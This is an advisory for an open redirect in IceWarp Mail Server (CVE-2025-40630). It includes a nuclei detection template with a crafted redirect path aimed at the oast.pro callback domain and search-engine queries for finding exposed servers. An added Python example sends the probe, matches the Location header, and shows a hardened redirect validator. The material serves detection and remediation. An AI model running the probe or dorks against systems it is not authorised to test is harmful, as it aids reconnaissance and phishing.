Vulnerability name: IceWarp Mail Server Open Redirect Vulnerability
Vulnerability ID:
CVE: CVE-2025-40630
Vulnerability type: Open Redirect (CWE-601)
Severity: Medium
Description: IceWarp Mail Server is a widely used mail server for enterprise deployments; it supports the common mail protocols (SMTP, POP3, IMAP and others) and is frequently found in corporate communication systems. Versions 11.4.0 and below contain an open redirect vulnerability: an attacker who crafts a malicious URL can send a user to an arbitrary external domain. The root cause is that the server does not sufficiently validate and restrict the redirect target, so a specially constructed URL bypasses the intended checks. A victim who follows such a link lands on an attacker-controlled site and is exposed to phishing or credential theft. The flaw can be exploited without authentication and the probe is trivially automated, but it does require the victim to follow the link (UI:R in the CVSS vector), which is why it is rated medium.
Vendor: icewarp
Product: mail_server
Affected versions: version <= 11.4.0
Search syntax: http.title:"IceWarp" OR title="IceWarp" OR intitle:"icewarp"
info:
  name: IceWarp Mail Server ≤11.4.0 - Open Redirect
  author: DhiyaneshDK
  severity: medium
  description: |
    IceWarp Mail Server version 11.4.0 and below contains an open redirect vulnerability that allows attackers to redirect users to arbitrary external domains through malicious URLs.
  impact: |
    An attacker can craft malicious URLs to redirect users to external malicious websites, potentially leading to phishing attacks or credential theft.
  remediation: |
    Update IceWarp Mail Server to a version newer than 11.4.0. Implement proper URL validation and restrict redirects to trusted domains only.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-40630
    - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-icewarp-mail-server
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-40630
    cwe-id: CWE-601
    epss-score: 0.00059
    epss-percentile: 0.18581
    cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: icewarp
    product: mail_server
    shodan-query: 'http.title:"IceWarp"'
    fofa-query: 'title="IceWarp"'
    google-query: intitle:"icewarp"
  tags: cve,cve2025,icewarp,redirect,open-redirect

http:
  - method: GET
    path:
      - "{{BaseURL}}/%2f%5c%2foast.pro%2f.."

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
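The template sends one GET for `/%2f%5c%2foast.pro%2f..`, which percent-decodes to `//\/oast.pro/..`; browsers treat a backslash in a URL like a forward slash, so a Location header that echoes this path back becomes a protocol-relative redirect to the oast.pro callback domain, which is what the header regex looks for. The Python script below is a worked example added here; it is not part of the nuclei template and not IceWarp's code. It applies the template's own Location regex to constructed 302 responses (made up for offline use, not captured from a real host), provides a `probe()` helper that issues the template's single GET without following redirects, and then shows an illustrative server-side validator of the kind the remediation calls for: it percent-decodes and normalises backslashes before deciding whether a redirect target stays on the same site. The validator and the function names are the example's own assumptions, not IceWarp's actual fix.

```python
import re
import urllib.error
import urllib.request
from urllib.parse import unquote, urlsplit

# Probe path and Location-header regex copied from the nuclei template above.
PROBE_PATH = "/%2f%5c%2foast.pro%2f.."
LOCATION_RE = re.compile(
    r'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
)

# Constructed sample responses for offline use; not captured from a real IceWarp host.
VULNERABLE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: //oast.pro/..\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)
SAFE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: /webmail/\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def matches_open_redirect(raw_response: str) -> bool:
    """Apply the template's header matcher: True when a Location header points
    at the oast.pro callback domain in any of the forms the regex accepts."""
    header_block = raw_response.split("\r\n\r\n", 1)[0]
    return LOCATION_RE.search(header_block) is not None


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx: the point is to inspect the Location header, not chase it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(base_url: str) -> str:
    """Send the template's single GET (max-request: 1) to base_url and return the
    response header block so matches_open_redirect() can judge it.
    Only run this against hosts you are authorised to test."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(base_url.rstrip("/") + PROBE_PATH, method="GET")
    try:
        resp = opener.open(req, timeout=10)
    except urllib.error.HTTPError as err:  # 3xx is raised here once redirects are disabled
        resp = err
    return "".join(f"{name}: {value}\r\n" for name, value in resp.headers.items())


def is_safe_local_redirect(target: str) -> bool:
    """Illustrative CWE-601 fix (assumed here, not IceWarp's code): accept a redirect
    target only if it is a same-site relative path. Percent-decode and normalise
    backslashes first, because browsers decode %2f/%5c and treat '\\' like '/',
    which is exactly what the probe path relies on."""
    decoded = unquote(target)
    normalised = decoded.replace("\\", "/")
    # Must be rooted, but "//host" is protocol-relative and would leave the site.
    if not normalised.startswith("/") or normalised.startswith("//"):
        return False
    parts = urlsplit(normalised)
    if parts.scheme or parts.netloc:
        return False
    # Reject traversal segments so ".." cannot climb out of the intended prefix.
    if ".." in parts.path.split("/"):
        return False
    return True


if __name__ == "__main__":
    print("template matcher on constructed 302:", matches_open_redirect(VULNERABLE_RESPONSE))
    print("hardened check on probe path:", is_safe_local_redirect(PROBE_PATH))
    print("hardened check on /webmail/:", is_safe_local_redirect("/webmail/"))
```

To test a host you own, feed `probe("https://mail.example.test")` into `matches_open_redirect()`; `probe()` deliberately stops at the first response so the Location header is inspected rather than followed, mirroring how the nuclei matcher works on the raw header.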